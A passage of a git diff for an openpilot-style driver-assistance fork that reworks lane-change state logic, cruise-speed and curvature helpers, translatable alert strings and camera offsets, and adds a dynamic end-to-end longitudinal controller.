LaneChangeState.preLaneChange self.lane_change_ll_prob = 1.0 - self.dp_lc_auto_done = False - self.dp_lc_auto_delay_start_sec = None - # LaneChangeState.preLaneChange elif self.lane_change_state == LaneChangeState.preLaneChange: # Set lane change direction @@ -87,68 +64,35 @@ class DesireHelper: ((carstate.steeringTorque > 0 and self.lane_change_direction == LaneChangeDirection.left) or (carstate.steeringTorque < 0 and self.lane_change_direction == LaneChangeDirection.right)) - if self.dp_lateral_mode == 2: - if self.dp_lc_auto_delay_start_sec is None: - self.dp_lc_auto_delay_start_sec = sec_since_boot() - else: - if one_blinker and not below_alc_speed and (not self.dp_lc_auto_done) and \ - (sec_since_boot() - self.dp_lc_auto_delay_start_sec >= self.dp_lc_auto_delay): - torque_applied = True + blindspot_detected = ((carstate.leftBlindspot and self.lane_change_direction == LaneChangeDirection.left) or + (carstate.rightBlindspot and self.lane_change_direction == LaneChangeDirection.right)) - - #dp - if self.dp_lateral_road_edge_detected: - left_road_edge = -md.roadEdges[0].y[0] - right_road_edge = md.roadEdges[1].y[0] - - road_edge_detected = (((left_road_edge < 3.5) and self.lane_change_direction == LaneChangeDirection.left) or - ((right_road_edge < 3.5) and self.lane_change_direction == LaneChangeDirection.right)) - else: - road_edge_detected = False - - if blindspot_detected: - self.dp_lc_auto_done = False - self.dp_lc_auto_delay_start_sec = None if not one_blinker or below_lane_change_speed: self.lane_change_state = LaneChangeState.off self.lane_change_direction = LaneChangeDirection.none - elif torque_applied and not blindspot_detected and not road_edge_detected: + elif torque_applied and not blindspot_detected: self.lane_change_state = LaneChangeState.laneChangeStarting # LaneChangeState.laneChangeStarting elif self.lane_change_state == LaneChangeState.laneChangeStarting: - if blindspot_detected: - self.lane_change_state = LaneChangeState.preLaneChange - self.lane_change_ll_prob = 1.0 - self.dp_lc_auto_done = False - self.dp_lc_auto_delay_start_sec = None - else: - # fade out over .5s - self.lane_change_ll_prob = max(self.lane_change_ll_prob - 2 * DT_MDL, 0.0) + # fade out over .5s + self.lane_change_ll_prob = max(self.lane_change_ll_prob - 2 * DT_MDL, 0.0) - # 98% certainty - if lane_change_prob < 0.02 and self.lane_change_ll_prob < 0.01: - self.lane_change_state = LaneChangeState.laneChangeFinishing + # 98% certainty + if lane_change_prob < 0.02 and self.lane_change_ll_prob < 0.01: + self.lane_change_state = LaneChangeState.laneChangeFinishing # LaneChangeState.laneChangeFinishing elif self.lane_change_state == LaneChangeState.laneChangeFinishing: - if blindspot_detected: - self.lane_change_state = LaneChangeState.preLaneChange - self.lane_change_ll_prob = 1.0 - self.dp_lc_auto_done = False - self.dp_lc_auto_delay_start_sec = None - else: - # fade in laneline over 1s - self.lane_change_ll_prob = min(self.lane_change_ll_prob + DT_MDL, 1.0) + # fade in laneline over 1s + self.lane_change_ll_prob = min(self.lane_change_ll_prob + DT_MDL, 1.0) - if self.lane_change_ll_prob > 0.99: - self.lane_change_direction = LaneChangeDirection.none - if one_blinker: - self.lane_change_state = LaneChangeState.preLaneChange - else: - self.lane_change_state = LaneChangeState.off - - self.dp_lc_auto_done = True + if self.lane_change_ll_prob > 0.99: + self.lane_change_direction = LaneChangeDirection.none + if one_blinker: + self.lane_change_state = LaneChangeState.preLaneChange + else: + self.lane_change_state = LaneChangeState.off if self.lane_change_state in (LaneChangeState.off, LaneChangeState.preLaneChange): self.lane_change_timer = 0.0 diff --git a/selfdrive/controls/lib/drive_helpers.py b/selfdrive/controls/lib/drive_helpers.py index c7ddeeb81..b7fd05893 100644 --- a/selfdrive/controls/lib/drive_helpers.py +++ b/selfdrive/controls/lib/drive_helpers.py @@ -20,10 +20,6 @@ MIN_SPEED = 1.0 CONTROL_N = 17 CAR_ROTATION_RADIUS = 0.0 -# dp - needed for 0813/0816 controller -LAT_MPC_N = 16 -LON_MPC_N = 32 - # EU guidelines MAX_LATERAL_JERK = 5.0 @@ -41,20 +37,15 @@ CRUISE_INTERVAL_SIGN = { ButtonType.decelCruise: -1, } +# mapd # Constants for Limit controllers. -LIMIT_ADAPT_ACC = -0.8 # (closer to zero ealier it decel) m/s^2 Ideal acceleration for the adapting (braking) phase when approaching speed limits. -LIMIT_MIN_ACC = -1.4 # m/s^2 Maximum deceleration allowed for limit controllers to provide. -LIMIT_MAX_ACC = 1.0 # m/s^2 Maximum acelration allowed for limit controllers to provide while active. +LIMIT_ADAPT_ACC = -1. # m/s^2 Ideal acceleration for the adapting (braking) phase when approaching speed limits. +LIMIT_MIN_ACC = -1.5 # m/s^2 Maximum deceleration allowed for limit controllers to provide. +LIMIT_MAX_ACC = 1.0 # m/s^2 Maximum acelration allowed for limit controllers to provide while active. LIMIT_MIN_SPEED = 8.33 # m/s, Minimum speed limit to provide as solution on limit controllers. -LIMIT_SPEED_OFFSET_TH = -1. # m/s Maximum offset between speed limit and current speed for adapting state. +LIMIT_SPEED_OFFSET_TH = -1. # m/s Maximum offset between speed limit and current speed for adapting state. LIMIT_MAX_MAP_DATA_AGE = 10. # s Maximum time to hold to map data, then consider it invalid inside limits controllers. -# dp - used in some lateral planners -class MPC_COST_LAT: - PATH = 1.0 - HEADING = 1.0 - STEER_RATE = 1.0 - class VCruiseHelper: def __init__(self, CP): self.CP = CP @@ -63,15 +54,12 @@ class VCruiseHelper: self.v_cruise_kph_last = 0 self.button_timers = {ButtonType.decelCruise: 0, ButtonType.accelCruise: 0} self.button_change_states = {btn: {"standstill": False, "enabled": False} for btn in self.button_timers} - self.dp_override_v_cruise_kph = V_CRUISE_UNSET - self.dp_override_cruise_speed_last = V_CRUISE_UNSET - self.dp_override_enabled_last = False @property def v_cruise_initialized(self): return self.v_cruise_kph != V_CRUISE_UNSET - def update_v_cruise(self, CS, enabled, is_metric, dp_override_speed): + def update_v_cruise(self, CS, enabled, is_metric): self.v_cruise_kph_last = self.v_cruise_kph if CS.cruiseState.available: @@ -81,25 +69,9 @@ class VCruiseHelper: self.v_cruise_cluster_kph = self.v_cruise_kph self.update_button_timers(CS, enabled) else: - if enabled and dp_override_speed and CS.cruiseState.speed * CV.MS_TO_KPH < dp_override_speed: - if self.dp_override_v_cruise_kph == V_CRUISE_UNSET: - self.dp_override_v_cruise_kph = max(CS.vEgo * CV.MS_TO_KPH, V_CRUISE_MIN) - else: - self.dp_override_v_cruise_kph = V_CRUISE_UNSET - - # when we have an override_speed, use it - if self.dp_override_v_cruise_kph != V_CRUISE_UNSET: - self.v_cruise_kph = self.dp_override_v_cruise_kph - self.v_cruise_cluster_kph = self.dp_override_v_cruise_kph - else: - self.v_cruise_kph = CS.cruiseState.speed * CV.MS_TO_KPH - self.v_cruise_cluster_kph = CS.cruiseState.speedCluster * CV.MS_TO_KPH - - self.dp_override_cruise_speed_last = CS.cruiseState.speed - self.dp_override_enabled_last = enabled - + self.v_cruise_kph = CS.cruiseState.speed * CV.MS_TO_KPH + self.v_cruise_cluster_kph = CS.cruiseState.speedCluster * CV.MS_TO_KPH else: - self.dp_override_v_cruise_kph = V_CRUISE_UNSET self.v_cruise_kph = V_CRUISE_UNSET self.v_cruise_cluster_kph = V_CRUISE_UNSET @@ -199,71 +171,7 @@ def rate_limit(new_value, last_value, dw_step, up_step): return clip(new_value, last_value + dw_step, last_value + up_step) -def get_lag_adjusted_curvature(CP, v_ego, psis, curvatures, curvature_rates, dp_lat_version): - if dp_lat_version == 1: # 0813 - return get_0813_lag_adjusted_curvature(CP, v_ego, psis, curvatures, curvature_rates) - elif dp_lat_version == 2: # 0816 - return get_0816_lag_adjusted_curvature(CP, v_ego, psis, curvatures, curvature_rates) - if len(psis) != CONTROL_N: - psis = [0.0]*CONTROL_N - curvatures = [0.0]*CONTROL_N - curvature_rates = [0.0]*CONTROL_N - v_ego = max(MIN_SPEED, v_ego) - - # TODO this needs more thought, use .2s extra for now to estimate other delays - delay = CP.steerActuatorDelay + .2 - - # MPC can plan to turn the wheel and turn back before t_delay. This means - # in high delay cases some corrections never even get commanded. So just use - # psi to calculate a simple linearization of desired curvature - current_curvature_desired = curvatures[0] - psi = interp(delay, T_IDXS[:CONTROL_N], psis) - average_curvature_desired = psi / (v_ego * delay) - desired_curvature = 2 * average_curvature_desired - current_curvature_desired - - # This is the "desired rate of the setpoint" not an actual desired rate - desired_curvature_rate = curvature_rates[0] - max_curvature_rate = MAX_LATERAL_JERK / (v_ego**2) # inexact calculation, check https://github.com/commaai/openpilot/pull/24755 - safe_desired_curvature_rate = clip(desired_curvature_rate, - -max_curvature_rate, - max_curvature_rate) - safe_desired_curvature = clip(desired_curvature, - current_curvature_desired - max_curvature_rate * DT_MDL, - current_curvature_desired + max_curvature_rate * DT_MDL) - - return safe_desired_curvature, safe_desired_curvature_rate - - -def get_0813_lag_adjusted_curvature(CP, v_ego, psis, curvatures, curvature_rates): - if len(psis) != CONTROL_N: - psis = [0.0]*CONTROL_N - curvatures = [0.0]*CONTROL_N - curvature_rates = [0.0]*CONTROL_N - - # TODO this needs more thought, use .2s extra for now to estimate other delays - delay = CP.steerActuatorDelay + .2 - current_curvature = curvatures[0] - psi = interp(delay, T_IDXS[:CONTROL_N], psis) - desired_curvature_rate = curvature_rates[0] - - # MPC can plan to turn the wheel and turn back before t_delay. This means - # in high delay cases some corrections never even get commanded. So just use - # psi to calculate a simple linearization of desired curvature - curvature_diff_from_psi = psi / (max(v_ego, 1e-1) * delay) - current_curvature - desired_curvature = current_curvature + 2 * curvature_diff_from_psi - - v_ego = max(v_ego, 0.1) - max_curvature_rate = MAX_LATERAL_JERK / (v_ego**2) - safe_desired_curvature_rate = clip(desired_curvature_rate, - -max_curvature_rate, - max_curvature_rate) - safe_desired_curvature = clip(desired_curvature, - current_curvature - max_curvature_rate * DT_MDL, - current_curvature + max_curvature_rate * DT_MDL) - - return safe_desired_curvature, safe_desired_curvature_rate - -def get_0816_lag_adjusted_curvature(CP, v_ego, psis, curvatures, curvature_rates): +def get_lag_adjusted_curvature(CP, v_ego, psis, curvatures, curvature_rates): if len(psis) != CONTROL_N: psis = [0.0]*CONTROL_N curvatures = [0.0]*CONTROL_N @@ -310,11 +218,3 @@ def get_speed_error(modelV2: log.ModelDataV2, v_ego: float) -> float: vel_err = clip(modelV2.temporalPose.trans[0] - v_ego, -MAX_VEL_ERR, MAX_VEL_ERR) return float(vel_err) return 0.0 - - -def get_lane_laneless_mode(lll_prob, rll_prob, mode): - if lll_prob < 0.3 and rll_prob < 0.3: - mode = False - elif lll_prob > 0.5 or rll_prob > 0.5: - mode = True - return mode diff --git a/selfdrive/controls/lib/dynamic_endtoend_controller.py b/selfdrive/controls/lib/dynamic_endtoend_controller.py new file mode 100644 index 000000000..a41234e65 --- /dev/null +++ b/selfdrive/controls/lib/dynamic_endtoend_controller.py @@ -0,0 +1,123 @@ +from common.numpy_fast import interp +from common.params import Params + +# d-e2e, from modeldata.h +TRAJECTORY_SIZE = 33 + +_DP_E2E_LEAD_COUNT = 5 + +_DP_E2E_STOP_BP = [0., 10., 20., 30., 40., 50., 55.] +_DP_E2E_STOP_DIST = [10, 30., 50., 70., 80., 90., 120.] +_DP_E2E_STOP_COUNT = 3 + +_DP_E2E_SNG_COUNT = 3 +_DP_E2E_SNG_ACC_COUNT = 5 +_DP_E2E_SWAP_COUNT = 10 + +_DP_E2E_TF_COUNT = 5 + + +class DynamicEndtoEndController: + + def __init__(self): + self._params = Params() + self._dp_long_de2e = False + self._mode = 'blended' + + # conditional e2e + self.dp_e2e_has_lead = False + self.dp_e2e_lead_last = False + self.dp_e2e_lead_count = 0 + self.dp_e2e_sng = False + self.dp_e2e_sng_count = 0 + self.dp_e2e_standstill_last = False + self.dp_e2e_swap_count = 0 + self.dp_e2e_stop_count = 0 + self.dp_e2e_tf_count = 0 + pass + + def read_params(self): + self._dp_long_de2e = self._params.get_bool('dp_long_de2e') + pass + + + def _set_dp_e2e_mode(self, mode, force=False): + if force: + self.dp_e2e_swap_count = 0 + self._mode = mode + return + + else: + # prevent switching in a short period of time. + if self._mode == mode: + self.dp_e2e_swap_count = 0 + else: + self.dp_e2e_swap_count += 1 + + if self.dp_e2e_swap_count >= _DP_E2E_SWAP_COUNT: + self._mode = mode + + + def _process_conditional_e2e(self, radar_unavailable, car_state, lead_one, md): + v_ego_kph = car_state.vEgo * 3.6 + + # make sure it see lead enough time + if lead_one.status != self.dp_e2e_lead_last: + self.dp_e2e_lead_count = 0 + else: + self.dp_e2e_lead_count += 1 + if self.dp_e2e_lead_count >= _DP_E2E_LEAD_COUNT: + self.dp_e2e_has_lead = lead_one.status + self.dp_e2e_lead_last = lead_one.status + + # when standstill, always e2e + if car_state.standstill: + self.dp_e2e_sng_count = 0 + self.dp_e2e_sng = False + return self._set_dp_e2e_mode('blended') + + if self.dp_e2e_standstill_last and not car_state.standstill: + self.dp_e2e_sng = True + + # when sng, we e2e for 0.5 secs + if self.dp_e2e_sng: + self.dp_e2e_sng_count += 1 + if self.dp_e2e_sng_count > _DP_E2E_SNG_COUNT: + if self.dp_e2e_sng_count > _DP_E2E_SNG_ACC_COUNT: + self.dp_e2e_sng = False + return self._set_dp_e2e_mode('acc', True) + return self._set_dp_e2e_mode('blended') + + # when we see a lead + # voacc cars only + if radar_unavailable and self.dp_e2e_has_lead: + ttc = lead_one.dRel / lead_one.vRel + if ttc <= interp(car_state.vEgo, [0., 22.2, 25.], [.85, 1., 1.22]): + self.dp_e2e_tf_count += 1 + else: + self.dp_e2e_tf_count = 0 + if self.dp_e2e_tf_count > _DP_E2E_TF_COUNT: + return self._set_dp_e2e_mode('blended', True) + + # stop sign detection + if abs(car_state.steeringAngleDeg) <= 60 and len(md.orientation.x) == len(md.position.x) == TRAJECTORY_SIZE: + if md.position.x[TRAJECTORY_SIZE - 1] < interp(v_ego_kph, _DP_E2E_STOP_BP, _DP_E2E_STOP_DIST): + self.dp_e2e_stop_count += 1 + else: + self.dp_e2e_stop_count = 0 + else: + self.dp_e2e_stop_count = 0 + + if self.dp_e2e_stop_count >= _DP_E2E_STOP_COUNT: + return self._set_dp_e2e_mode('blended', True) + + return self._set_dp_e2e_mode('acc') + + def set_mpc_mode(self, mode, radar_unavailable, car_state, lead_one, md): + if not self._dp_long_de2e: + return 'blended' + + self._mode = mode + self._process_conditional_e2e(radar_unavailable, car_state, lead_one, md) + return self._mode + diff --git a/selfdrive/controls/lib/events.py b/selfdrive/controls/lib/events.py old mode 100644 new mode 100755 index 1ee4aad61..34ee744c1 --- a/selfdrive/controls/lib/events.py +++ b/selfdrive/controls/lib/events.py @@ -235,12 +235,12 @@ def startup_master_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubM return StartupAlert(_("WARNING: This branch is not tested"), branch, alert_status=AlertStatus.userPrompt) def below_engage_speed_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: - return NoEntryAlert(f"Drive above {get_display_speed(CP.minEnableSpeed, metric)} to engage") + return NoEntryAlert(_("Drive above {speed} to engage").format(speed=get_display_speed(CP.minEnableSpeed, metric))) def below_steer_speed_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: return Alert( - _("Steer Unavailable Below %s") % get_display_speed(CP.minSteerSpeed, metric), + _("Steer Unavailable Below {speed}").format(speed=get_display_speed(CP.minSteerSpeed, metric)), "", AlertStatus.userPrompt, AlertSize.small, Priority.MID, VisualAlert.steerRequired, AudibleAlert.prompt, 0.4) @@ -249,8 +249,8 @@ def below_steer_speed_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.S def calibration_incomplete_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: first_word = _('Recalibration') if sm['liveCalibration'].calStatus == log.LiveCalibrationData.Status.recalibrating else _('Calibration') return Alert( - f"{first_word} in Progress: {sm['liveCalibration'].calPerc:.0f}%", - f"Drive Above {get_display_speed(MIN_SPEED_FILTER, metric)}", + _("{word} in Progress: {perc}%").format(word=first_word, perc=sm['liveCalibration'].calPerc), + _("Drive Above {speed}").format(speed=get_display_speed(MIN_SPEED_FILTER, metric)), AlertStatus.normal, AlertSize.mid, Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2) @@ -266,13 +266,13 @@ def no_gps_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, m def out_of_space_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: full_perc = round(100. - sm['deviceState'].freeSpacePercent) - return NormalPermanentAlert(_("Out of Storage"), _("%s%% full") % full_perc) + return NormalPermanentAlert(_("Out of Storage"), _("{full_perc}% full").format(full_perc=full_perc)) def posenet_invalid_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: mdl = sm['modelV2'].velocity.x[0] if len(sm['modelV2'].velocity.x) else math.nan err = CS.vEgo - mdl - msg = f"Speed Error: {err:.1f} m/s" + msg = _("Speed Error: {err:.1f} m/s").format(err=err) return NoEntryAlert(msg, alert_text_1=_("Posenet Speed Invalid")) @@ -298,7 +298,7 @@ def calibration_invalid_alert(CP: car.CarParams, CS: car.CarState, sm: messaging rpy = sm['liveCalibration'].rpyCalib yaw = math.degrees(rpy[2] if len(rpy) == 3 else math.nan) pitch = math.degrees(rpy[1] if len(rpy) == 3 else math.nan) - angles = f"Remount Device (Pitch: {pitch:.1f}°, Yaw: {yaw:.1f}°)" + angles = _("Remount Device (Pitch: {pitch:.1f}°, Yaw: {yaw:.1f}°)").format(pitch=pitch, yaw=yaw) return NormalPermanentAlert(_("Calibration Invalid"), angles) @@ -310,16 +310,16 @@ def overheat_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, def low_memory_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: - return NormalPermanentAlert(_("Low Memory"), f"{sm['deviceState'].memoryUsagePercent}% used") + return NormalPermanentAlert(_("Low Memory"), _("{memory_usage_percent}% used").format(memory_usage_percent=sm['deviceState'].memoryUsagePercent)) def high_cpu_usage_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: x = max(sm['deviceState'].cpuUsagePercent, default=0.) - return NormalPermanentAlert(_("High CPU Usage"), _("%s%% used") % x) + return NormalPermanentAlert(_("High CPU Usage"), _("{x}% used").format(x=x)) def modeld_lagging_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: - return NormalPermanentAlert(_("Driving Model Lagging"), f"{sm['modelV2'].frameDropPerc:.1f}% frames dropped") + return NormalPermanentAlert(_("Driving Model Lagging"), _("{frame_drop_perc:.1f}% frames dropped").format(frame_drop_perc=sm['modelV2'].frameDropPerc)) def wrong_car_mode_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: @@ -332,18 +332,9 @@ def wrong_car_mode_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubM def joystick_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: axes = sm['testJoystick'].axes gb, steer = list(axes)[:2] if len(axes) else (0., 0.) - vals = f"Gas: {round(gb * 100.)}%, Steer: {round(steer * 100.)}%" + vals = _("Gas: {gas_percent}%, Steer: {steer_percent}%").format(gas_percent=round(gb * 100.), steer_percent=round(steer * 100.)) return NormalPermanentAlert(_("Joystick Mode"), vals) -def speed_limit_adjust_alert(CP: car.CarParams, CS: car.CarState, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert: - speedLimit = sm['longitudinalPlan'].speedLimit - speed = round(speedLimit * (CV.MS_TO_KPH if metric else CV.MS_TO_MPH)) - message = _("Adjusting to %(speed)s %(unit)s") % ({"speed": speed, "unit": (_("km/h") if metric else _("mph"))}) - return Alert( - message, - "", - AlertStatus.normal, AlertSize.small, - Priority.LOW, VisualAlert.none, AudibleAlert.none, 4.) EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { @@ -398,7 +389,7 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { }, EventName.cruiseMismatch: { - #ET.PERMANENT: ImmediateDisableAlert(_("openpilot failed to cancel cruise")), + #ET.PERMANENT: ImmediateDisableAlert("openpilot failed to cancel cruise"), }, # openpilot doesn't recognize the car. This switches openpilot into a @@ -451,7 +442,7 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { }, EventName.steerTempUnavailableSilent: { - ET.WARNING: Alert( + ET.PERMANENT: Alert( _("Steering Temporarily Unavailable"), "", AlertStatus.userPrompt, AlertSize.small, @@ -544,10 +535,10 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { EventName.laneChangeBlocked: { ET.PERMANENT: Alert( - _("Car Detected in Blindspot or RoadEdge"), + _("Car Detected in Blindspot"), "", AlertStatus.userPrompt, AlertSize.small, - Priority.LOW, VisualAlert.none, AudibleAlert.prompt, .2), + Priority.LOW, VisualAlert.none, AudibleAlert.prompt, .1), }, EventName.laneChange: { @@ -593,19 +584,7 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { # current GPS position. This alert is thrown when the localizer is reset # more often than expected. EventName.localizerMalfunction: { - # ET.PERMANENT: NormalPermanentAlert(_("Sensor Malfunction"), _("Hardware Malfunction")), - }, - - EventName.speedLimitActive: { - ET.WARNING: Alert( - "Cruise set to speed limit", - "", - AlertStatus.normal, AlertSize.small, - Priority.LOW, VisualAlert.none, AudibleAlert.none, 2.), - }, - - EventName.speedLimitValueChange: { - ET.WARNING: speed_limit_adjust_alert, + # ET.PERMANENT: NormalPermanentAlert("Sensor Malfunction", "Hardware Malfunction"), }, # ********** events that affect controls state transitions ********** @@ -624,7 +603,7 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { EventName.buttonCancel: { ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage), - ET.NO_ENTRY: NoEntryAlert("Cancel Pressed"), + ET.NO_ENTRY: NoEntryAlert(_("Cancel Pressed")), }, EventName.brakeHold: { @@ -673,7 +652,7 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { }, EventName.resumeBlocked: { - ET.NO_ENTRY: NoEntryAlert("Press Set to Engage"), + ET.NO_ENTRY: NoEntryAlert(_("Press Set to Engage")), }, EventName.wrongCruiseMode: { @@ -687,8 +666,8 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { }, EventName.steerTimeLimit: { - ET.SOFT_DISABLE: soft_disable_alert("Vehicle Steering Time Limit"), - ET.NO_ENTRY: NoEntryAlert("Vehicle Steering Time Limit"), + ET.SOFT_DISABLE: soft_disable_alert(_("Vehicle Steering Time Limit")), + ET.NO_ENTRY: NoEntryAlert(_("Vehicle Steering Time Limit")), }, EventName.outOfSpace: { @@ -730,7 +709,7 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { }, EventName.wrongGear: { - # ET.SOFT_DISABLE: user_soft_disable_alert(_("Gear not D")), + ET.SOFT_DISABLE: user_soft_disable_alert(_("Gear not D")), ET.NO_ENTRY: NoEntryAlert(_("Gear not D")), }, @@ -747,14 +726,14 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { EventName.calibrationIncomplete: { ET.PERMANENT: calibration_incomplete_alert, - ET.SOFT_DISABLE: soft_disable_alert("Calibration Incomplete"), - ET.NO_ENTRY: NoEntryAlert("Calibration in Progress"), + ET.SOFT_DISABLE: soft_disable_alert(_("Calibration Incomplete")), + ET.NO_ENTRY: NoEntryAlert(_("Calibration in Progress")), }, EventName.calibrationRecalibrating: { ET.PERMANENT: calibration_incomplete_alert, - ET.SOFT_DISABLE: soft_disable_alert("Device Remount Detected: Recalibrating"), - ET.NO_ENTRY: NoEntryAlert("Remount Detected: Recalibrating"), + ET.SOFT_DISABLE: soft_disable_alert(_("Device Remount Detected: Recalibrating")), + ET.NO_ENTRY: NoEntryAlert(_("Remount Detected: Recalibrating")), }, EventName.doorOpen: { @@ -839,8 +818,8 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { }, EventName.highCpuUsage: { - #ET.SOFT_DISABLE: soft_disable_alert(_("System Malfunction: Reboot Your Device")), - #ET.PERMANENT: NormalPermanentAlert(_("System Malfunction"), _("Reboot your Device")), + #ET.SOFT_DISABLE: soft_disable_alert("System Malfunction: Reboot Your Device"), + #ET.PERMANENT: NormalPermanentAlert("System Malfunction", "Reboot your Device"), ET.NO_ENTRY: high_cpu_usage_alert, }, @@ -915,9 +894,9 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { ET.PERMANENT: Alert( _("Reverse\nGear"), "", - AlertStatus.normal, AlertSize.none, + AlertStatus.normal, AlertSize.full, Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2, creation_delay=0.5), - # ET.USER_DISABLE: ImmediateDisableAlert(_("Reverse Gear")), + ET.USER_DISABLE: ImmediateDisableAlert(_("Reverse Gear")), ET.NO_ENTRY: NoEntryAlert(_("Reverse Gear")), }, @@ -976,15 +955,40 @@ EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = { EventName.vehicleSensorsInvalid: { ET.IMMEDIATE_DISABLE: ImmediateDisableAlert(_("Vehicle Sensors Invalid")), ET.PERMANENT: NormalPermanentAlert(_("Vehicle Sensors Calibrating"), _("Drive to Calibrate")), - ET.NO_ENTRY: NoEntryAlert(_("Vehicle Sensors Calibrating"), _("Drive to Calibrate")), + ET.NO_ENTRY: NoEntryAlert(_("Vehicle Sensors Calibrating")), }, - # dp - use for manual lane change - EventName.manualSteeringRequiredBlinkersOn: { - ET.PERMANENT: Alert( - _("STEERING REQUIRED: Blinkers ON"), - "", - AlertStatus.normal, AlertSize.small, - Priority.LOW, VisualAlert.none, AudibleAlert.none, .0, alert_rate=0.25), - }, } + + +if __name__ == '__main__': + # print all alerts by type and priority + from cereal.services import service_list + from collections import defaultdict, OrderedDict + + event_names = {v: k for k, v in EventName.schema.enumerants.items()} + alerts_by_type: Dict[str, Dict[int, List[str]]] = defaultdict(lambda: defaultdict(list)) + + CP = car.CarParams.new_message() + CS = car.CarState.new_message() + sm = messaging.SubMaster(list(service_list.keys())) + + for i, alerts in EVENTS.items(): + for et, alert in alerts.items(): + if callable(alert): + alert = alert(CP, CS, sm, False, 1) + priority = alert.priority + alerts_by_type[et][priority].append(event_names[i]) + + all_alerts = {} + for et, priority_alerts in alerts_by_type.items(): + all_alerts[et] = OrderedDict([ + (str(priority), l) + for priority, l in sorted(priority_alerts.items(), key=lambda x: -int(x[0])) + ]) + + for status, evs in sorted(all_alerts.items(), key=lambda x: x[0]): + print(f"**** {status} ****") + for p, alert_list in evs.items(): + print(f" {p}:") + print(" ", ', '.join(alert_list), "\n") diff --git a/selfdrive/controls/lib/lane_planner.py b/selfdrive/controls/lib/lane_planner.py index 4c56577b7..133b51205 100644 --- a/selfdrive/controls/lib/lane_planner.py +++ b/selfdrive/controls/lib/lane_planner.py @@ -3,7 +3,7 @@ from cereal import log from common.filter_simple import FirstOrderFilter from common.numpy_fast import interp from common.realtime import DT_MDL -from selfdrive.hardware import TICI#, EON +from selfdrive.hardware import TICI from system.swaglog import cloudlog @@ -11,8 +11,13 @@ TRAJECTORY_SIZE = 33 # camera offset is meters from center car to camera # model path is in the frame of EON's camera. TICI is 0.1 m away, # however the average measured path difference is 0.04 m -PATH_OFFSET = 0.00 -CAMERA_OFFSET = 0.04 +if TICI: + CAMERA_OFFSET = 0.04 + PATH_OFFSET = 0.04 +# PC +else: + CAMERA_OFFSET = 0.0 + PATH_OFFSET = 0.0 class LanePlanner: @@ -35,25 +40,25 @@ class LanePlanner: self.l_lane_change_prob = 0. self.r_lane_change_prob = 0. - self.camera_offset = -CAMERA_OFFSET - self.path_offset = -PATH_OFFSET + self.camera_offset = CAMERA_OFFSET + self.path_offset = PATH_OFFSET - self.dp_camera_offset = None - self.dp_path_offset = None + # self.dp_camera_offset = None + # self.dp_path_offset = None - def update_dp_camera_offsets(self, camera_offset, path_offset): - if self.dp_camera_offset != camera_offset: - self.dp_camera_offset = camera_offset - camera_offset = -camera_offset - # from 0.04 to -0.04, difference is -0.08 - # so we can assume the distance between C3's 2 cameras is 8 cm - self.camera_offset = camera_offset * 0.01 - if self.dp_path_offset != path_offset: - self.dp_path_offset = path_offset - path_offset = -path_offset - # from 0.04 to -0.04, difference is -0.08 - # so we can assume the distance between C3's 2 cameras is 8 cm - self.path_offset = path_offset * 0.01 + # def update_dp_camera_offsets(self, camera_offset, path_offset): + # if self.dp_camera_offset != camera_offset: + # self.dp_camera_offset = camera_offset + # camera_offset = -camera_offset + # # from 0.04 to -0.04, difference is -0.08 + # # so we can assume the distance between C3's 2 cameras is 8 cm + # self.camera_offset = camera_offset * 0.01 + # if self.dp_path_offset != path_offset: + # self.dp_path_offset = path_offset + # path_offset = -path_offset + # # from 0.04 to -0.04, difference is -0.08 + # # so we can assume the distance between C3's 2 cameras is 8 cm + # self.path_offset = path_offset * 0.01 def parse_model(self, md): lane_lines = md.laneLines diff --git a/selfdrive/controls/lib/latcontrol_lqr.py b/selfdrive/controls/lib/latcontrol_lqr.py deleted file mode 100644 index a5f02e6ce..000000000 --- a/selfdrive/controls/lib/latcontrol_lqr.py +++ /dev/null @@ -1,85 +0,0 @@ -import math -import numpy as np - -from common.numpy_fast import clip -from common.realtime import DT_CTRL -from cereal import log -from selfdrive.controls.lib.latcontrol import LatControl - - -class LatControlLQR(LatControl): - def __init__(self, CP, 